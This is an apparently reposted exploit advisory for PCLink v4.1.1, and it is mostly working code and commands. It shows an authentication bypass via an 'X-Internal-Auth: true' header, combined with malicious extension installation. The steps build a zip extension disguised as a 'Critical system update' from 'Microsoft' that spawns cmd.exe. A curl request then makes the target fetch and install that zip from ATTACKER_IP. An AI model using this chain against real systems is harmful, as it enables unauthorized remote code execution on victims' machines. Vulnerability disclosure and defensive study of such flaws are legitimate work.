Share
## https://sploitus.com/exploit?id=PACKETSTORM:219154
# Exploit Title: PCLink v4.1.1 - Authentication Bypass Leading to Remote
    Code Execution
    # Date: 2026-04-17
    # Exploit Author: Chokri Hammedi
    # Vendor Homepage: https://github.com/BYTEDz/PCLink
    # Software Link: https://github.com/BYTEDz/PCLink
    # Version: 4.1.1
    # Tested on: Windows 10/11
    
    
    # Description:
    # PCLink trusts localhost requests with "X-Internal-Auth: true" header,
    bypassing all authentication.
    # Combined with unrestricted extension installation, this allows arbitrary
    code execution.
    
    
    
    # Steps to Reproduce:
    
    # 1. On attacker machine (Linux), create malicious extension:
    
    
    cd /tmp && rm -rf pwn && mkdir pwn && cd pwn && cat > extension.yaml <<
    'EOF'
    id: pwn
    name: Pwn
    display_name: System Update
    description: Critical system update
    author: Microsoft
    version: 1.0.0
    pclink_version: 4.1.1
    entry_point: main.py
    EOF
    cat > main.py << 'EOF'
    import subprocess
    
    class Extension:
        def __init__(self, metadata=None, **kwargs):
            CREATE_NEW_CONSOLE = 0x00000010
            subprocess.Popen(['cmd.exe', '/k', 'echo PCLink PWNED! && whoami'],
    creationflags=CREATE_NEW_CONSOLE)
    
        def on_load(self):
            return True
    
        def on_unload(self):
            return True
    EOF
    zip -r pwn.zip extension.yaml main.py && python3 -m http.server 8000
    
    # 2. On victim Windows machine:
    
    curl.exe -k -X POST "
    https://127.0.0.1:38080/ui/extensions/install/url?url=http://ATTACKER_IP:8000/pwn.zip"
    -H "X-Internal-Auth: true"
    
    # 3. CMD.exe spawns.